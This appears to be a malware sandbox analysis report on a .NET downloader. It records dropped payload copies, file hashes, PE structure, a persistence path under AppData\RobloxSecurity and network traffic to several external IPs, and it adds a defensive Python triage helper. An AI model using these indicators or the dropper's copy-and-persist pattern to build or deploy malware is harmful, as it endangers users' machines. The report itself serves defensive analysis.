                                                                                                    SHA1:7A5EF77FF6B9A251B38EA7284D14F31CE1F72D41
                                                                                                    SHA-256:DB9E2A6D8EF4584F7B714716AA2637B2CFD3B8F55939CFE15B0EE3DAD61D7E80
                                                                                                    SHA-512:362F8BD77889F4C6F1786B88E0AAF095174CCCD831B5BC4886659A6D3DB6693C13E17A97674B0A510A5820CAA0C6C59DD95785089203990961B9DFF9169900C3
                                                                                                    Malicious:false
                                                                                                    Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):131528
                                                                                                    Entropy (8bit):5.587236079192015
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:UsziYfIDSul4Z49b1KACKvCfGZ4sYRuRnsqlEr:UsvESS4Z49b1bSG2snm
                                                                                                    MD5:869F82DF0992DC2F5155D8F69FD1C9CF
                                                                                                    SHA1:5B48D32ACA1F7705C03E2BD592F68A2B9C9A7A22
                                                                                                    SHA-256:D77412B72A893EE96E82D7EFBD9FC2612176DA00DF5EBC066C13C303F558BCC9
                                                                                                    SHA-512:B0F0E7F6354B64CAC887600690531BA93F8AEB79E746FB9848C5F16F09931E3D8B5C2AD2A617FB9C978020450B4F717F9485D468B9C6098E6F319A59B26FAD19
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....[..........."...0.................. ........@.. .......................@............`.................................L...O.......8................'... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...8...........................@..@.reloc....... ......................@..B........................H...........X.......5...................................................PK..........................................5...P...n...w...{...................................................................|.......................8...K.......................[......."...#...&...'...........=.......F.......8...............2...p...s...a............ ...#...'...+...c...i...i...i...i..PK......PK......PK......PK..F...o .....(r....*".(s....*.s,........*.(&....*~(....ou....!...~!...(3....".
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    (The same 60-byte file, SHA-256 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7, is listed three more times, each dropped by a separate C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe instance; those three records are byte-identical to the one above and are not repeated here. The count matters: it is one AppLocker policy test file per PowerShell process started, so four PowerShell invocations occurred during the run.)
                                                                                                    Process:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:modified
                                                                                                    Size (bytes):120
                                                                                                    Entropy (8bit):4.564485170699406
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:BOzReCWAMb7iDRVivmiurQlyrWRYAdMKq8QFKxrg5bvn:UaXiDRAYrQlyrKKv6c5bvn
                                                                                                    MD5:E10E8583FFEE40E89FEF7419CC14ADA4
                                                                                                    SHA1:1D97614F6E46CB7B87F96740E9C315931BDAF222
                                                                                                    SHA-256:615581F4791B9D308FDC033455A8E2F22A01CE236C185908652B8B0A93CFF589
                                                                                                    SHA-512:6139701FA1C1B937611500F4875CB000E03FDA04732BA6F7B0BA074E7FA2AFDCC8970A6C326B8754F9E1C87BE56E2DDF1293F957B6EA9C07228E062936B06AAD
                                                                                                    Malicious:false
                                                                                                    Preview:Failed to listen on prefix 'http://127.0.0.1:6787/' because it conflicts with an existing registration on the machine...
                                                                                                    Process:C:\Users\user\Desktop\jqOHOuPMJP.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):131528
                                                                                                    Entropy (8bit):5.587236079192015
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:UsziYfIDSul4Z49b1KACKvCfGZ4sYRuRnsqlEr:UsvESS4Z49b1bSG2snm
                                                                                                    MD5:869F82DF0992DC2F5155D8F69FD1C9CF
                                                                                                    SHA1:5B48D32ACA1F7705C03E2BD592F68A2B9C9A7A22
                                                                                                    SHA-256:D77412B72A893EE96E82D7EFBD9FC2612176DA00DF5EBC066C13C303F558BCC9
                                                                                                    SHA-512:B0F0E7F6354B64CAC887600690531BA93F8AEB79E746FB9848C5F16F09931E3D8B5C2AD2A617FB9C978020450B4F717F9485D468B9C6098E6F319A59B26FAD19
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....[..........."...0.................. ........@.. .......................@............`.................................L...O.......8................'... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...8...........................@..@.reloc....... ......................@..B........................H...........X.......5...................................................PK..........................................5...P...n...w...{...................................................................|.......................8...K.......................[......."...#...&...'...........=.......F.......8...............2...p...s...a............ ...#...'...+...c...i...i...i...i..PK......PK......PK......PK..F...o .....(r....*".(s....*.s,........*.(&....*~(....ou....!...~!...(3....".
                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1835008
                                                                                                    Entropy (8bit):4.466124802594884
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:lIXfpi67eLPU9skLmb0b44WSPKaJG8nAgejZMMhA2gX4WABl0uNEdwBCswSbA:GXD944WlLZMM6YFHq+A
                                                                                                    MD5:0B41F0D1011D6FFA013E52F811F4F71B
                                                                                                    SHA1:61D222828FC0895D776ABE64598659C31B038EFA
                                                                                                    SHA-256:550D698638F5585C2C5605D7BF1D8D2D6CB51795D62A084A5FC1B5B69D4AED55
                                                                                                    SHA-512:919455EED658B8532490C95E7A333186D1B69E0636F1339834DE431CD2E132D2E5B9644570A46563326EE33E46E74A036C516A9D5834AA3C7C05DC70173DCE86
                                                                                                    Malicious:false
                                                                                                    Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...?4\..............................................................................................................................................................................................................................................................................................................................................4...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\System32\timeout.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.41440934524794
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                                                                                                    MD5:3DD7DD37C304E70A7316FE43B69F421F
                                                                                                    SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                                                                                                    SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                                                                                                    SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                                                                                                    Malicious:false
                                                                                                    Preview:..Waiting for 3 seconds, press a key to continue ....2.1.0..
                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Entropy (8bit):5.261474995854771
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                                    File name:jqOHOuPMJP.exe
                                                                                                    File size:14'336 bytes
                                                                                                    MD5:7e9a93c69aecfc2bbda9470fbd4556db
                                                                                                    SHA1:ab0e810472a897affac1a761b49595939f6897a9
                                                                                                    SHA256:82e68bb4f56181a0b2458f2861aa7b5fa1bb0f4ce30907d579c3b92707ef2647
                                                                                                    SHA512:59abfa455c148c88959f992864de627857e950d9abb36b49efd979da4139a50847932d9577d658d0d793802ef5a6f6b91520440af2ff983dbf04126cf909d342
                                                                                                    SSDEEP:384:1R8wtU1eai/zbM/XygkxOu6cyhLWi1fXlSW:1eCU1vi7blHhyhiij
                                                                                                    TLSH:2F522C3577E49637CABE0E7649B253404375EA068822DFDD2CC8600D5DD3B868562FB7
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....A..........."...0..............M... ...`....@.. ....................................`................................
                                                                                                    Icon Hash:90cececece8e8eb0
                                                                                                    Entrypoint:0x404d16
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:false
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0x8F4114C5 [Wed Feb 28 05:04:05 2046 UTC] (a future date; the high bit of the field is set, which is what the Roslyn compiler writes for deterministic builds, so this value is a hash of the build inputs, not a compile time, and should not be used for timelining)
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:4
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:4
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:4
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744 (the generic import hash shared by virtually every .NET executable, whose only native import is mscoree.dll!_CorExeMain; it has no clustering value for this sample)
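The static fields above carry two traps for a triager: a PE timestamp that decodes to 2046, and an import hash that every .NET assembly shares. The dropped-file list above carries a third pattern worth checking mechanically: the same SHA-256 appearing under two paths (Temp and RobloxSecurity), which is a self-copy rather than a second payload. The following Python is an added example written for this page, not Joe Sandbox output or code from the sample; it re-keys the hashes, paths and dropping processes from the report into a small record list (the four AppLocker test files are kept without a file name because the report does not show one) and applies the three checks. The import-hash routine follows the pefile algorithm for named imports.

```python
"""Triage helpers for the static and dropped-file facts listed in this report."""
import hashlib
from collections import defaultdict
from datetime import datetime, timezone

# Dropped-file records re-keyed from the report above (SHA-256 values, dropping
# processes and paths copied from the page).  The four AppLocker test files are
# listed without a file name because the report does not show one.
DROPPED = [
    {"sha256": "D77412B72A893EE96E82D7EFBD9FC2612176DA00DF5EBC066C13C303F558BCC9",
     "process": r"C:\Users\user\Desktop\jqOHOuPMJP.exe",
     "path": r"C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe"},
    {"sha256": "D77412B72A893EE96E82D7EFBD9FC2612176DA00DF5EBC066C13C303F558BCC9",
     "process": r"C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe",
     "path": r"C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe"},
] + [
    {"sha256": "96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7",
     "process": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "path": None}
    for _ in range(4)
]


def group_by_sha256(records):
    """Bucket dropped-file records by content hash (case-insensitive hex)."""
    groups = defaultdict(list)
    for rec in records:
        groups[rec["sha256"].lower()].append(rec)
    return dict(groups)


def copies_of(records, sha256):
    """Distinct on-disk paths carrying one hash: same bytes at a new location
    means a self-copy (here Temp -> RobloxSecurity), not a second payload."""
    recs = group_by_sha256(records).get(sha256.lower(), [])
    return sorted({r["path"] for r in recs if r["path"]})


def classify_pe_timestamp(ts, now_ts=None):
    """Sanity-check a PE TimeDateStamp.  Roslyn deterministic builds store a hash
    of the build inputs here with the high bit set, so the field decodes to a
    date decades in the future and says nothing about when the file was built."""
    now_ts = int(datetime.now(timezone.utc).timestamp()) if now_ts is None else now_ts
    when = datetime.fromtimestamp(ts, tz=timezone.utc)
    if ts & 0x80000000:
        return "deterministic-build hash, not a compile time", when
    if ts > now_ts:
        return "future date, not a compile time", when
    return "plausible", when


def imphash(imports):
    """pefile-style import hash for named imports: 'lib.func' per entry,
    lower-cased, library extension stripped, comma-joined, MD5.
    (pefile additionally resolves ordinal-only imports; none occur here.)"""
    parts = []
    for lib, func in imports:
        lib = lib.lower()
        for ext in (".dll", ".ocx", ".sys"):
            if lib.endswith(ext):
                lib = lib[: -len(ext)]
                break
        parts.append(f"{lib}.{func.lower()}")
    return hashlib.md5(",".join(parts).encode("ascii")).hexdigest()


if __name__ == "__main__":
    verdict, when = classify_pe_timestamp(0x8F4114C5)
    print(f"Time Stamp 0x8F4114C5 -> {when:%a %b %d %H:%M:%S %Y} UTC: {verdict}")
    # A .NET executable's only native import is mscoree.dll!_CorExeMain.
    print("imphash(mscoree!_CorExeMain) =", imphash([("mscoree.dll", "_CorExeMain")]))
    payload = "D77412B72A893EE96E82D7EFBD9FC2612176DA00DF5EBC066C13C303F558BCC9"
    for path in copies_of(DROPPED, payload):
        print("payload copy:", path)
    for sha, recs in group_by_sha256(DROPPED).items():
        droppers = sorted({r["process"] for r in recs})
        print(f"{sha[:16]}... dropped {len(recs)}x by {droppers}")
```

Running it reproduces the report's 2046 date from the raw field and flags it as a deterministic-build hash, reproduces the import hash in the table from the single mscoree import (so a match on that value says "this is .NET" and nothing more), and shows the 131528-byte downloader under both its Temp and RobloxSecurity paths, which is the persistence copy rather than a new file to hunt for.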
                                                                                                    Instruction
                                                                                                    jmp dword ptr [00402000h]   (the standard .NET native entry stub: an indirect jump through the import address table at the start of .text to mscoree!_CorExeMain; the "add byte ptr [eax], al" lines that follow are the disassembler's rendering of 00 00 padding, not code)
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x4cc1           0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x6000           0x59c         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x8000           0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x4c3c           0x38          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0x2d1c        0x2e00    6a50215a4de9009c9822c87b3aefe82a  False     0.5207201086956522  data       5.580839345941778    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x6000           0x59c         0x600     32791b53ec0675637a2192fac6511faa  False     0.4166666666666667  data       4.030670859022482    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x8000           0xc           0x200     6136f169555e82248bf6cc07cc9f65cc  False     0.044921875         data       0.08153941234324169  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA     Size   Type                                                                                Language  Country  ZLIB Complexity
RT_VERSION   0x6090  0x30c  data                                                                                                   0.4358974358974359
RT_MANIFEST  0x63ac  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                      0.5489795918367347
DLL          Import
mscoree.dll  _CorExeMain
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                                                    Feb 10, 2024 16:17:09.756719112 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756735086 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.756742954 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756764889 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756782055 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.756788015 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756812096 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756833076 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.756835938 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756861925 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756880045 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.756886005 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756911993 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756931067 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.756933928 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756957054 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.756975889 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.756979942 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757004023 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757019997 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.757028103 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757050991 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757067919 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.757075071 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757097960 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757117033 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.757121086 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757143974 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757159948 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757174969 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.757188082 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757211924 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757213116 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.757236958 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757261038 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757270098 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.757286072 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757302999 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.757309914 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757334948 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757350922 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.757356882 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757379055 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757396936 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.757402897 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757422924 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757446051 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.757488012 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757512093 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757531881 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.757538080 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757563114 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757581949 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.757585049 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757611036 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757625103 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.757635117 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757659912 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757679939 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.757683039 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757707119 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757730007 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.757734060 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757757902 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757775068 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.757781982 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757807970 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757823944 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.757829905 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757853985 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.757878065 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.811032057 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:10.511420012 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:17.530775070 CET4973780192.168.2.4208.95.112.1
                                                                                                    Feb 10, 2024 16:17:17.643243074 CET8049737208.95.112.1192.168.2.4
                                                                                                    Feb 10, 2024 16:17:17.643338919 CET4973780192.168.2.4208.95.112.1
                                                                                                    Feb 10, 2024 16:17:17.644812107 CET4973780192.168.2.4208.95.112.1
                                                                                                    Feb 10, 2024 16:17:17.759489059 CET8049737208.95.112.1192.168.2.4
                                                                                                    Feb 10, 2024 16:17:17.811027050 CET4973780192.168.2.4208.95.112.1
                                                                                                    Feb 10, 2024 16:17:18.230317116 CET497388080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:18.445640087 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:18.445828915 CET497388080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:18.446048021 CET497388080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:18.534595966 CET4973980192.168.2.4208.95.112.1
                                                                                                    Feb 10, 2024 16:17:18.650083065 CET8049739208.95.112.1192.168.2.4
                                                                                                    Feb 10, 2024 16:17:18.650326014 CET4973980192.168.2.4208.95.112.1
                                                                                                    Feb 10, 2024 16:17:18.650660992 CET4973980192.168.2.4208.95.112.1
                                                                                                    Feb 10, 2024 16:17:18.661389112 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:18.661967039 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:18.662472010 CET497388080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:18.682216883 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:18.827989101 CET8049739208.95.112.1192.168.2.4
                                                                                                    Feb 10, 2024 16:17:18.873574972 CET4973980192.168.2.4208.95.112.1
                                                                                                    Feb 10, 2024 16:17:18.877712011 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:18.877770901 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:18.877856970 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:18.878010035 CET497388080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:18.889868975 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:18.890094995 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:18.897110939 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:18.919461966 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:18.919538021 CET497388080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:19.093199015 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:19.093239069 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:19.093260050 CET497388080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:19.093283892 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:19.093306065 CET497388080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:19.093328953 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:19.093344927 CET497388080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:19.093358994 CET497388080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:19.093374014 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:19.093385935 CET497388080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:19.093409061 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:19.093426943 CET497388080192.168.2.4185.119.118.59
